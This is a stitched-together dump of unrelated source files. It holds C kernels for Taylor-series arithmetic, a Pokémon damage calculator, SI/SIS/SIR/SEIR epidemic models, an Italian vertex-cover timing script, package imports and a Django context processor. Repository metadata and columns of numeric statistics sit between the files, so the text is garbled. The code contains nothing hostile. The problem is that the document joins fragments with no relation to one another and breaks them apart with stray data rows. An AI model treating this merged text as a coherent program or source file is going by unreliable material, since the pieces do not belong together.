        for(int d=0; d != D; ++d){
            result[d] += lhs[d];
            result[d] += rhs[d];
        }
    }
}
"""

# Taylor subtraction kernel (adouble.__sub__): result = lhs - rhs,
# assuming `result` is zero-initialised by the caller (as in __add__).
# BUG FIX: the original used `result -= lhs` as well, which computed
# -(lhs + rhs) instead of lhs - rhs; the lhs term is now added.
c_code_adouble__sub__ = """
void sub(int Ndim_lhs, int * Dims_lhs, double *lhs, int Ndim_rhs, int * Dims_rhs, double *rhs, int Ndim_result, int * Dims_result, double *result){
    if(Ndim_lhs == 2){
        const int D = Dims_lhs[0];
        const int Ndir = Dims_lhs[1];
        for(int d=0; d != D; ++d){
            for(int n=0; n != Ndir; ++n){
                result[d*Ndir + n] += lhs[d*Ndir+n];
                result[d*Ndir + n] -= rhs[d*Ndir+n];
            }
        }
    }
    else{
        const int D = Dims_lhs[0];
        for(int d=0; d != D; ++d){
            result[d] += lhs[d];
            result[d] -= rhs[d];
        }
    }
}
"""

# Taylor multiplication kernel (adouble.__mul__): truncated convolution
# of the coefficient arrays, result assumed zero-initialised.
# BUG FIX: the 2-D branch iterated `k != d` (i.e. k < d) and therefore
# dropped the k == d term lhs[d]*rhs[0]; the 1-D branch correctly uses
# `k <= d`, and the 2-D branch now matches it.
c_code_adouble__mul__ = """
void mul(int Ndim_lhs, int * Dims_lhs, double *lhs, int Ndim_rhs, int * Dims_rhs, double *rhs, int Ndim_result, int * Dims_result, double *result){
    if(Ndim_lhs == 2){
        const int D = Dims_lhs[0];
        const int Ndir = Dims_lhs[1];
        for(int d=0; d != D; ++d){
            for(int k = 0; k <= d; ++k){
                for(int n=0; n != Ndir; ++n){
                    result[d*Ndir + n] += lhs[k*Ndir+n] * rhs[(d-k)*Ndir+n];
                }
            }
        }
    }
    else{
        const int D = Dims_lhs[0];
        for(int d=0; d != D; ++d){
            for(int k = 0; k <= d; ++k){
                result[d] += lhs[k] * rhs[d-k];
            }
        }
    }
}
"""

# Taylor division kernel (adouble.__div__): solves result*rhs = lhs for
# the coefficients of `result` by forward substitution (result assumed
# zero-initialised); divides by the zeroth-order rhs coefficient.
c_code_adouble__div__ = """
void div(int Ndim_lhs, int * Dims_lhs, double *lhs, int Ndim_rhs, int * Dims_rhs, double *rhs, int Ndim_result, int * Dims_result, double *result){
    if(Ndim_lhs == 2){
        const int D = Dims_lhs[0];
        const int Ndir = Dims_lhs[1];
        for(int d=0; d != D; ++d){
            for(int n=0; n != Ndir; ++n){
                result[d*Ndir+n]+=lhs[d*Ndir+n];
            }
            for(int k=0; k!=d; ++k){
                for(int n=0; n != Ndir; ++n){
                    result[d*Ndir + n] -= result[k*Ndir + n]*rhs[(d-k)*Ndir + n];
                }
            }
            for(int n=0; n != Ndir; ++n){
                result[d*Ndir + n] /= rhs[0+n];
            }
        }
    }
    else{
        const int D = Dims_lhs[0];
        for(int d=0; d != D; ++d){
            result[d]+=lhs[d];
            for(int k=0; k!=d; ++k){
                result[d] -= result[k]*rhs[d-k];
            }
            result[d] /= rhs[0];
        }
    }
}
"""

# Compile the kernels with instant; each triple declares the (ndim, dims,
# data) argument group instant/numpy passes for one array argument.
adouble__add__ = instant.inline_with_numpy(c_code_adouble__add__, arrays=[['Ndim_lhs', 'Dims_lhs', 'lhs'], ['Ndim_rhs', 'Dims_rhs', 'rhs'], ['Ndim_result', 'Dims_result', 'result']] )
adouble__sub__ = instant.inline_with_numpy(c_code_adouble__sub__, arrays=[['Ndim_lhs', 'Dims_lhs', 'lhs'], ['Ndim_rhs', 'Dims_rhs', 'rhs'], ['Ndim_result', 'Dims_result', 'result']] )
adouble__mul__ = instant.inline_with_numpy(c_code_adouble__mul__, arrays=[['Ndim_lhs', 'Dims_lhs', 'lhs'], ['Ndim_rhs', 'Dims_rhs', 'rhs'], ['Ndim_result', 'Dims_result', 'result']] )
adouble__div__ = instant.inline_with_numpy(c_code_adouble__div__, arrays=[['Ndim_lhs', 'Dims_lhs', 'lhs'], ['Ndim_rhs', 'Dims_rhs', 'rhs'], ['Ndim_result', 'Dims_result', 'result']] )
adouble__imul__ = instant.inline_with_numpy(c_code_adouble__imul__, arrays=[['tmp_lhs','lhs'],['Ndim_lhs', 'Dims_lhs', 'lhs_tc'], ['Ndim_rhs', 'Dims_rhs', 'rhs_tc']] )
| 34.180645
| 183
| 0.469234
| 790
| 5,298
| 2.910127
| 0.04557
| 0.069595
| 0.044367
| 0.056546
| 0.881688
| 0.85298
| 0.84515
| 0.761635
| 0.717268
| 0.717268
| 0
| 0.0167
| 0.34447
| 5,298
| 154
| 184
| 34.402597
| 0.645263
| 0
| 0
| 0.447552
| 0
| 0.062937
| 0.855228
| 0.010759
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.006993
| 0
| 0.006993
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a787b8c723436b3dd5f85a394d89275d6c7179db
| 2,465
|
py
|
Python
|
pokebot/models/estimator/damage_formula.py
|
nacharya114/pokebot
|
b9028c86c5ee58178f348c75c39225f7b55507aa
|
[
"MIT"
] | 1
|
2020-05-20T04:52:24.000Z
|
2020-05-20T04:52:24.000Z
|
pokebot/models/estimator/damage_formula.py
|
nacharya114/pokebot
|
b9028c86c5ee58178f348c75c39225f7b55507aa
|
[
"MIT"
] | null | null | null |
pokebot/models/estimator/damage_formula.py
|
nacharya114/pokebot
|
b9028c86c5ee58178f348c75c39225f7b55507aa
|
[
"MIT"
] | null | null | null |
import numpy as np
from numpy.random import rand
import poke_env as penv
from poke_env.environment.battle import Battle
from poke_env.environment.pokemon import Pokemon
from poke_env.environment.move import Move
from poke_env.environment.move_category import MoveCategory
from poke_env.environment.pokemon_type import PokemonType
def calcDamage(activePokemon, oppActivePokemon, moveUsed):
    """Estimate the damage ``activePokemon`` deals to ``oppActivePokemon``
    with ``moveUsed``, using the mainline damage formula:

        floor((((2*level/5 + 2) * power * A/D) / 50 + 2) * modifier)

    The modifier combines targets, weather, critical hit, the random roll,
    STAB, type effectiveness, burn and an "other" catch-all; all except the
    random roll, STAB and type effectiveness are fixed to 1 here.

    :param activePokemon: attacking Pokemon (poke_env Pokemon)
    :param oppActivePokemon: defending Pokemon (poke_env Pokemon)
    :param moveUsed: the move being used (poke_env Move)
    :return: 1-element numpy array holding the floored damage estimate
    :raises ValueError: if the move is neither PHYSICAL nor SPECIAL
    """
    # Fixes vs original: missing ':' on the def (SyntaxError), undefined
    # name `moveTyping` in the STAB check, and `np.any(<generator>)`
    # which is always truthy so STAB was unconditionally 1.5.
    activeMonTypes = activePokemon.types
    level = activePokemon.level
    weather = 1  # weather boosts not modelled
    burn = 1     # burn status not modelled
    moveCategory = moveUsed.category
    activeMonStats = activePokemon.stats
    oppActiveMonStats = oppActivePokemon.stats
    if moveCategory == MoveCategory.PHYSICAL:
        A = activeMonStats["Atk"]
        D = oppActiveMonStats["Def"]
    elif moveCategory == MoveCategory.SPECIAL:
        A = activeMonStats["SpA"]
        D = oppActiveMonStats["SpD"]
    else:
        # Original code fell through with A/D undefined (NameError);
        # fail with a clear message instead.
        raise ValueError("calcDamage only supports PHYSICAL/SPECIAL moves")
    power = moveUsed.base_power
    moveType = moveUsed.type
    # STAB applies when the move shares a type with the attacker.
    STAB = 1.5 if moveType in activeMonTypes else 1
    targets = 1
    critical = 1
    random = (1 - 0.85) * rand(1) + 0.85  # uniform roll in [0.85, 1.0)
    other = 1
    damageMultiplier = moveUsed.type.damage_multiplier(
        oppActivePokemon.type_1, oppActivePokemon.type_2)
    modifier = targets * weather * critical * random * STAB * damageMultiplier * burn * other
    damage = np.floor((((((2 * level / 5) + 2) * power * A / D) / 50) + 2) * modifier)
    return damage
def calcDamage_model(activePokemon, oppActivePokemon, A, D, moveUsed):
    """Damage estimate variant that accepts externally supplied attack (A)
    and defense (D) values, e.g. from an estimator model.

    NOTE(review): for PHYSICAL/SPECIAL moves the supplied ``A``/``D`` are
    overwritten with the Pokemons' real stats (mirroring calcDamage); the
    passed values only survive for other move categories.  Confirm this is
    intended rather than leftover copy-paste.

    :param activePokemon: attacking Pokemon (poke_env Pokemon)
    :param oppActivePokemon: defending Pokemon (poke_env Pokemon)
    :param A: fallback attack stat value
    :param D: fallback defense stat value
    :param moveUsed: the move being used (poke_env Move)
    :return: 1-element numpy array holding the floored damage estimate
    """
    # Fixes vs original: missing ':' on the def and on the if/elif
    # (SyntaxError), `oppActiveMonStats` referenced without being defined
    # (NameError on any PHYSICAL/SPECIAL move), and the always-true
    # `np.any(<generator>)` STAB check using the undefined `moveTyping`.
    activeMonTypes = activePokemon.types
    level = activePokemon.level
    weather = 1  # weather boosts not modelled
    burn = 1     # burn status not modelled
    moveCategory = moveUsed.category
    activeMonStats = activePokemon.stats
    oppActiveMonStats = oppActivePokemon.stats
    if moveCategory == MoveCategory.PHYSICAL:
        A = activeMonStats["Atk"]
        D = oppActiveMonStats["Def"]
    elif moveCategory == MoveCategory.SPECIAL:
        A = activeMonStats["SpA"]
        D = oppActiveMonStats["SpD"]
    power = moveUsed.base_power
    moveType = moveUsed.type
    # STAB applies when the move shares a type with the attacker.
    STAB = 1.5 if moveType in activeMonTypes else 1
    targets = 1
    critical = 1
    random = (1 - 0.85) * rand(1) + 0.85  # uniform roll in [0.85, 1.0)
    other = 1
    damageMultiplier = moveUsed.type.damage_multiplier(
        oppActivePokemon.type_1, oppActivePokemon.type_2)
    modifier = targets * weather * critical * random * STAB * damageMultiplier * burn * other
    damage = np.floor((((((2 * level / 5) + 2) * power * A / D) / 50) + 2) * modifier)
    return damage
| 21.25
| 101
| 0.727383
| 295
| 2,465
| 6.020339
| 0.230508
| 0.023649
| 0.030968
| 0.061937
| 0.835023
| 0.773086
| 0.773086
| 0.773086
| 0.773086
| 0.773086
| 0
| 0.024108
| 0.158621
| 2,465
| 115
| 102
| 21.434783
| 0.832208
| 0.009331
| 0
| 0.761905
| 0
| 0
| 0.00984
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.126984
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
a79ba78ba77c07cc2743ff50d997e886c35cc706
| 8,278
|
py
|
Python
|
Differential Equation/epidemic.py
|
FinCreWorld/Mathematical-Modeling-with-Python
|
d5206309bce32f2aa64fe94ab4e8a576add0e628
|
[
"MIT"
] | null | null | null |
Differential Equation/epidemic.py
|
FinCreWorld/Mathematical-Modeling-with-Python
|
d5206309bce32f2aa64fe94ab4e8a576add0e628
|
[
"MIT"
] | 1
|
2021-08-21T09:36:54.000Z
|
2021-08-21T09:36:54.000Z
|
Differential Equation/epidemic.py
|
FinCreWorld/Mathematical-Modeling-with-Python
|
d5206309bce32f2aa64fe94ab4e8a576add0e628
|
[
"MIT"
] | 3
|
2021-08-21T09:25:22.000Z
|
2021-08-29T12:04:49.000Z
|
import numpy as np
from scipy.integrate import solve_ivp
import matplotlib.pyplot as plt
class SI:
    """Susceptibles-Infectives model without recovery.

    Once infected, an individual stays infective forever; prediction uses
    the closed-form logistic solution of the SI equation.
    """

    def __init__(self,
                 N: int,
                 r: int,
                 beta: float,
                 I0: int) -> None:
        """
        :param N: total population, fixed
        :param r: number of contacts per person per time
        :param beta: probability of disease transmission in a contact
        :param I0: initial infectives population
        """
        self.N = N
        self.r = r
        self.beta = beta
        self.I0 = I0

    def predict(self, t: np.ndarray) -> np.ndarray:
        """Return the number of infectives at each time in ``t``."""
        decay = np.exp(-self.r * self.beta * t)
        return self.N * self.I0 / (self.I0 + (self.N - self.I0) * decay)

    def show(self, t_begin: float, t_end: float) -> None:
        """Plot infective and susceptible fractions over [t_begin, t_end]."""
        fig, axis = plt.subplots(1, 1)
        axis.set_title('SI Model\n' +
                       r'$r=%d,\,\beta=%.6f$' % (self.r, self.beta))
        axis.set_xlabel('Time')
        axis.set_ylabel('Fraction')
        axis.set_xlim(t_begin, t_end)
        axis.set_ylim(0, 1)
        times = np.linspace(t_begin, t_end, 100)
        infectives = self.predict(times)
        susceptibles = self.N - infectives
        axis.plot(times, infectives / self.N, label='Infectives')
        axis.plot(times, susceptibles / self.N, label='Susceptibles')
        plt.legend()
        plt.show()
class SIS:
    """Susceptibles-Infectives model with recovery but no immunity.

    Recovered individuals immediately become susceptible again; prediction
    uses the closed-form solution of the SIS equation.
    """

    def __init__(self,
                 N: int,
                 r: int,
                 beta: float,
                 gamma: float,
                 I0: int) -> None:
        """
        :param N: total population, fixed
        :param r: number of contacts per person per time
        :param beta: probability of disease transmission in a contact
        :param gamma: probability of recovery
        :param I0: initial infectives population
        """
        self.N = N
        self.r = r
        self.beta = beta
        self.gamma = gamma
        self.I0 = I0

    def predict(self, t: np.ndarray) -> np.ndarray:
        """Return the number of infectives at each time in ``t``."""
        net_rate = self.r * self.beta - self.gamma
        plateau = self.N * net_rate / (self.r * self.beta)
        decay = np.exp(-net_rate * t)
        return plateau / (1 + (plateau / self.I0 - 1) * decay)

    def show(self, t_begin: float, t_end: float) -> None:
        """Plot infective and susceptible fractions over [t_begin, t_end]."""
        fig, axis = plt.subplots(1, 1)
        axis.set_title('SIS Model\n' +
                       r'$r=%d,\,\beta=%.6f,\,\gamma=%.6f$' % (self.r, self.beta, self.gamma))
        axis.set_xlabel('Time')
        axis.set_ylabel('Fraction')
        axis.set_xlim(t_begin, t_end)
        axis.set_ylim(0, 1)
        times = np.linspace(t_begin, t_end, 100)
        infectives = self.predict(times)
        susceptibles = self.N - infectives
        axis.plot(times, infectives / self.N, label='Infectives')
        axis.plot(times, susceptibles / self.N, label='Susceptibles')
        plt.legend()
        plt.show()
class SIR:
    """Susceptibles-Infectives-Removed model.

    Infectives recover with permanent immunity; the system is integrated
    numerically since no closed form exists.
    """

    def __init__(self,
                 N: int,
                 r: int,
                 beta: float,
                 gamma: float,
                 I0: int,
                 R0: int) -> None:
        """
        :param N: total population, fixed
        :param r: number of contacts per person per time
        :param beta: probability of disease transmission in a contact
        :param gamma: probability of recovery
        :param I0: initial infectives population
        :param R0: initial removed population
        """
        self.N = N
        self.r = r
        self.beta = beta
        self.gamma = gamma
        self.I0 = I0
        self.R0 = R0

    def predict(self, t: np.ndarray) -> np.ndarray:
        """Integrate the SIR ODEs; returns an array with rows [S, I, R]."""
        contact = self.r * self.beta

        def deriv(_, y):
            """y = [S, I, R]"""
            new_infections = contact * y[1] * y[0] / self.N
            recoveries = self.gamma * y[1]
            return np.array([-new_infections,
                             new_infections - recoveries,
                             recoveries])

        initial = np.array([self.N - self.I0 - self.R0, self.I0, self.R0])
        res = solve_ivp(fun=deriv,
                        t_span=(0, np.max(t)),
                        y0=initial,
                        method='RK45',
                        t_eval=t)
        return res.y

    def show(self, t_begin: float, t_end: float) -> None:
        """Plot all three compartment fractions over [t_begin, t_end]."""
        fig, axis = plt.subplots(1, 1)
        axis.set_title('SIR Model\n' +
                       r'$r=%d,\,\beta=%.6f,\,\gamma=%.6f$' % (self.r, self.beta, self.gamma))
        axis.set_xlabel('Time')
        axis.set_ylabel('Fraction')
        axis.set_xlim(t_begin, t_end)
        axis.set_ylim(0, 1)
        times = np.linspace(t_begin, t_end, 100)
        sol = self.predict(times)
        susceptibles, infectives, removed = sol[0], sol[1], sol[2]
        axis.plot(times, infectives / self.N, label='Infectives')
        axis.plot(times, susceptibles / self.N, label='Susceptibles')
        axis.plot(times, removed / self.N, label='Removed')
        plt.legend()
        plt.show()
class SEIR:
    """Susceptibles-Exposed-Infectives-Removed model.

    Exposed individuals are infected but not yet infectious; infectives
    recover with permanent immunity.  Integrated numerically.
    """

    def __init__(self,
                 N: int,
                 r: int,
                 beta: float,
                 sigma: float,
                 gamma: float,
                 E0: int,
                 I0: int,
                 R0: int) -> None:
        """
        :param N: total population, fixed
        :param r: number of contacts per person per time
        :param beta: probability of disease transmission in a contact
        :param sigma: probability of exposed -> infectives
        :param gamma: probability of recovery
        :param E0: initial exposed population
        :param I0: initial infectives population
        :param R0: initial removed population
        """
        self.N = N
        self.r = r
        self.beta = beta
        self.sigma = sigma
        self.gamma = gamma
        self.E0 = E0
        self.I0 = I0
        self.R0 = R0
        # Everyone not exposed, infective or removed starts susceptible.
        self.S0 = self.N - E0 - I0 - R0

    def predict(self, t: np.ndarray) -> np.ndarray:
        """Integrate the SEIR ODEs; returns an array with rows [S, E, I, R]."""
        contact = self.r * self.beta

        def deriv(_, y):
            """y = [S, E, I, R]"""
            exposures = contact * y[2] * y[0] / self.N
            onsets = self.sigma * y[1]
            recoveries = self.gamma * y[2]
            return np.array([-exposures,
                             exposures - onsets,
                             onsets - recoveries,
                             recoveries])

        res = solve_ivp(fun=deriv,
                        t_span=(0, np.max(t)),
                        y0=np.array([self.S0, self.E0, self.I0, self.R0]),
                        method='RK45',
                        t_eval=t)
        return res.y

    def show(self, t_begin: float, t_end: float) -> None:
        """Plot all four compartment fractions over [t_begin, t_end]."""
        fig, axis = plt.subplots(1, 1)
        axis.set_title('SEIR Model\n' +
                       r'$r=%d,\,\beta=%.6f,\,\sigma=%.6f,\,\gamma=%.6f$' % (self.r, self.beta, self.sigma, self.gamma))
        axis.set_xlabel('Time')
        axis.set_ylabel('Fraction')
        axis.set_xlim(t_begin, t_end)
        axis.set_ylim(0, 1)
        times = np.linspace(t_begin, t_end, 100)
        sol = self.predict(times)
        susceptibles, exposed, infectives, removed = sol[0], sol[1], sol[2], sol[3]
        axis.plot(times, infectives / self.N, label='Infectives')
        axis.plot(times, exposed / self.N, label='Exposed')
        axis.plot(times, susceptibles / self.N, label='Susceptibles')
        axis.plot(times, removed / self.N, label='Removed')
        plt.legend()
        plt.show()
def main():
    """Demo entry point: run one SEIR scenario and display the plot."""
    # Other example scenarios (uncomment to explore):
    # model = SI(N=1000, r=120, beta=0.005, I0=1)
    # model = SIS(N=1000, r=100, beta=0.005, gamma=0.1, I0=1)
    # model = SIR(N=1000, r=100, beta=0.003, gamma=0.1, I0=1, R0=0)
    # model.show(t_begin=0, t_end=100)
    # model = SIR(N=1000, r=100, beta=0.003, gamma=0.1, I0=20, R0=400)
    # model.show(t_begin=0, t_end=100)
    # model = SEIR(N=1000, r=100, beta=0.003, sigma=0.3, gamma=0.1, E0=40, I0=20, R0=0)
    # model.show(t_begin=0, t_end=100)
    model = SEIR(N=10000, r=20, beta=0.03, sigma=0.1, gamma=0.1, E0=0, I0=1, R0=0)
    model.show(t_begin=0, t_end=140)


if __name__ == '__main__':
    main()
| 34.491667
| 118
| 0.517758
| 1,177
| 8,278
| 3.525064
| 0.107052
| 0.036153
| 0.032538
| 0.034466
| 0.857315
| 0.83008
| 0.807423
| 0.772234
| 0.765968
| 0.753676
| 0
| 0.043366
| 0.345373
| 8,278
| 239
| 119
| 34.635983
| 0.722273
| 0.225054
| 0
| 0.748387
| 0
| 0
| 0.057486
| 0.018613
| 0
| 0
| 0
| 0
| 0
| 1
| 0.096774
| false
| 0
| 0.019355
| 0.006452
| 0.180645
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a7a9bfb16945c8fc02d7d517186ed42f860acfb8
| 61
|
py
|
Python
|
dragon/func/__init__.py
|
InfernalAzazel/dragon
|
464056feb8ecaac55eabedb0a083ea9f609a5753
|
[
"Apache-2.0"
] | null | null | null |
dragon/func/__init__.py
|
InfernalAzazel/dragon
|
464056feb8ecaac55eabedb0a083ea9f609a5753
|
[
"Apache-2.0"
] | null | null | null |
dragon/func/__init__.py
|
InfernalAzazel/dragon
|
464056feb8ecaac55eabedb0a083ea9f609a5753
|
[
"Apache-2.0"
] | null | null | null |
from func import jd_front_event
from func import jd_web_hook
| 20.333333
| 31
| 0.868852
| 12
| 61
| 4.083333
| 0.666667
| 0.326531
| 0.571429
| 0.653061
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.131148
| 61
| 2
| 32
| 30.5
| 0.924528
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
a7dc294b0dd46ac3f64e09396849dc5f1321ce8a
| 155
|
py
|
Python
|
probeye/inference/torch_/__init__.py
|
BAMresearch/probeye
|
ff018ef629f7d5ce4a263b6656b363f90ab6be02
|
[
"MIT"
] | null | null | null |
probeye/inference/torch_/__init__.py
|
BAMresearch/probeye
|
ff018ef629f7d5ce4a263b6656b363f90ab6be02
|
[
"MIT"
] | 42
|
2021-08-24T06:50:17.000Z
|
2022-03-25T09:05:41.000Z
|
probeye/inference/torch_/__init__.py
|
BAMresearch/probeye
|
ff018ef629f7d5ce4a263b6656b363f90ab6be02
|
[
"MIT"
] | 2
|
2021-11-14T22:30:54.000Z
|
2022-02-28T13:39:00.000Z
|
# module imports
from probeye.inference.torch_ import noise_models
from probeye.inference.torch_ import priors
from probeye.inference.torch_ import solver
| 31
| 49
| 0.858065
| 21
| 155
| 6.142857
| 0.52381
| 0.255814
| 0.465116
| 0.581395
| 0.72093
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.096774
| 155
| 4
| 50
| 38.75
| 0.921429
| 0.090323
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
ac0b39275d3539e83041db32829caa1370193789
| 13,176
|
py
|
Python
|
pkg_1/scriptTesting7.py
|
giuseppemas/3gruppo_4_TDP
|
d85c5e232cbaa0a9a3512fdce906ea9fab7b1334
|
[
"MIT"
] | null | null | null |
pkg_1/scriptTesting7.py
|
giuseppemas/3gruppo_4_TDP
|
d85c5e232cbaa0a9a3512fdce906ea9fab7b1334
|
[
"MIT"
] | null | null | null |
pkg_1/scriptTesting7.py
|
giuseppemas/3gruppo_4_TDP
|
d85c5e232cbaa0a9a3512fdce906ea9fab7b1334
|
[
"MIT"
] | null | null | null |
'''Experimentally evaluate the performance of the two vertex-cover methods on
a sample of at least k graphs (k > 50) with n vertices (n > 50) chosen at
random.  For each graph report the sizes of the vertex covers returned by the
two methods and their execution times.  Compute how much faster, on average,
the greedy algorithm is compared to the optimal one and how much larger the
returned vertex cover is.'''
from pkg_1.MyGraph import MyGraph
import time


def _build_file_graph(num_vertices, filename, limit, step):
    """Build a MyGraph with vertices 1..num_vertices and edges read from
    ``filename``, printing the vertex and edge lists.

    Edge lines start at file-line index 2 and are sampled every ``step``
    lines; ``limit`` bounds the line index (None means the whole file).
    Returns the populated graph.
    """
    graph = MyGraph()
    vert = [graph.insert_vertex(i) for i in range(1, num_vertices + 1)]
    print("Vertici: [")
    for v in graph.vertices():
        print(v, end=", ")
    print("]\n\n")
    with open(filename, "r") as in_file:  # read the edge list from file
        lettura = in_file.read().splitlines()
    if limit is None:
        limit = len(lettura)
    i = 2
    while i < limit:
        endpoints = lettura[i].split(" ")  # the two endpoints of one edge
        # Linear search for the vertex whose element matches each endpoint;
        # kept from the original code so behavior is unchanged even if the
        # vertex order ever differs from the element values.
        j = 0
        while vert[j]._element != int(endpoints[0]):
            j = j + 1
        z = 0
        while vert[z]._element != int(endpoints[1]):
            z = z + 1
        graph.insert_edge(vert[j], vert[z])
        i = i + step
    print("Archi: [")
    for e in graph.edges():
        print(e, end=", ")
    print("]\n\n")
    return graph


def _compare_vertex_covers(graph, print_time_delta=True):
    """Run the greedy and the exact (minimum) vertex-cover algorithms on
    ``graph``, printing both covers, their sizes, timings and a comparison.

    ``print_time_delta`` controls the final "seconds less" line, which the
    flower test (#4) in the original script omitted.
    """
    print("Greedy vertex cover: ")
    # time.clock() was removed in Python 3.8; time.perf_counter() is the
    # documented replacement for measuring elapsed intervals.
    inizio_GVC = time.perf_counter()
    listGVC = graph.greedy_vertex_cover()
    fine_GVC = time.perf_counter()
    t_GVC = fine_GVC - inizio_GVC
    for elem in listGVC:
        print(elem, end=", ")
    print("\nMin vertex cover: ")
    inizio_MVC = time.perf_counter()
    listMVC = graph.min_vertex_cover()
    fine_MVC = time.perf_counter()
    t_MVC = fine_MVC - inizio_MVC
    for elem in listMVC:
        print(elem, end=", ")
    print("\n\nGREEDY --> Dim =", len(listGVC), ", Time =", t_GVC, "s\n")
    print("MIN --> Dim =", len(listMVC), ", Time =", t_MVC, "s\n")
    print("La dimensione dell'algoritmo Greedy è di", len(listGVC)-len(listMVC), "vertici in più rispetto all'algoritmo Min.\n")
    print("L'algoritmo Greedy è", t_MVC/t_GVC, "volte piu' veloce di quello Min.\n")
    if print_time_delta:
        print("L'algoritmo Greedy impiega", t_MVC-t_GVC, "secondi in meno rispetto a quello Min.\n")
    print("\n\n")


print("Testing50 #1: Grafo non diretto non pesato con 51 vertici e 20 archi")
_compare_vertex_covers(_build_file_graph(51, "test50.txt", None, 5))

print("Testing50 #2: Grafo non diretto non pesato con 51 vertici e 25 archi")
_compare_vertex_covers(_build_file_graph(51, "test50.txt", None, 4))

print("Testing50 #3: Grafo non diretto non pesato con 51 vertici 34 archi")
_compare_vertex_covers(_build_file_graph(51, "test50.txt", None, 3))

print("Testing50 #4: Fiore --> Grafo non diretto non pesato con 26 vertici e 73 archi")
# "Flower" graph built by hand: 26 vertices labelled 'a'..'z'.
G = MyGraph()
V = [G.insert_vertex(chr(c)) for c in range(ord('a'), ord('z') + 1)]
# Hub: connect the first vertex to every other vertex.
for i in range(len(V)):
    if i != 0:
        G.insert_edge(V[0], V[i])
# Ring: connect consecutive outer vertices, closing the cycle.
for i in range(len(V)):
    if i != 0 and i != len(V) - 1:
        G.insert_edge(V[i], V[i + 1])
G.insert_edge(V[-1], V[1])
# Chords: connect each outer vertex to the one two positions ahead.
for i in range(len(V)):
    if i != 0 and (i != len(V) - 2 and i != len(V) - 1):
        G.insert_edge(V[i], V[i + 2])
_compare_vertex_covers(G, print_time_delta=False)

print("Testing50 #5: Tratto dai miserabili.txt: Grafo non diretto pesato con 77 vertici e 77 archi")
_compare_vertex_covers(_build_file_graph(77, "miserabili.txt", 78, 1))

print("Testing50 #6: Tratto dai miserabili.txt: Grafo non diretto pesato con 77 vertici e 100 archi")
_compare_vertex_covers(_build_file_graph(77, "miserabili.txt", 101, 1))

print("Testing50 #7: Tratto dai miserabili.txt: Grafo non diretto pesato con 77 vertici e 120 archi")
_compare_vertex_covers(_build_file_graph(77, "miserabili.txt", 121, 1))
| 32.694789
| 124
| 0.625152
| 2,072
| 13,176
| 3.873552
| 0.078185
| 0.034388
| 0.025916
| 0.045353
| 0.939447
| 0.878021
| 0.869424
| 0.869424
| 0.862945
| 0.845502
| 0
| 0.018308
| 0.166743
| 13,176
| 403
| 125
| 32.694789
| 0.712724
| 0.098968
| 0
| 0.855556
| 0
| 0
| 0.248692
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.005556
| 0
| 0.005556
| 0.311111
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ac39f83e4f760903de48bafcef37b0b0ef9233d9
| 111
|
py
|
Python
|
websocketstest/context_processors.py
|
phildini/websockets-test
|
e81fd37cfcc880b29bb895db8369321a9bb3f612
|
[
"Apache-2.0"
] | null | null | null |
websocketstest/context_processors.py
|
phildini/websockets-test
|
e81fd37cfcc880b29bb895db8369321a9bb3f612
|
[
"Apache-2.0"
] | 6
|
2021-03-19T02:20:24.000Z
|
2021-09-22T19:00:24.000Z
|
websocketstest/context_processors.py
|
phildini/websockets-test
|
e81fd37cfcc880b29bb895db8369321a9bb3f612
|
[
"Apache-2.0"
] | null | null | null |
from django.conf import settings
def webpack_env(request):
    """Template context processor: expose the configured WEBPACK_ENV setting.

    `request` is required by the context-processor protocol but unused.
    """
    context = {"WEBPACK_ENV": settings.WEBPACK_ENV}
    return context
| 15.857143
| 48
| 0.765766
| 15
| 111
| 5.466667
| 0.666667
| 0.365854
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.144144
| 111
| 6
| 49
| 18.5
| 0.863158
| 0
| 0
| 0
| 0
| 0
| 0.099099
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
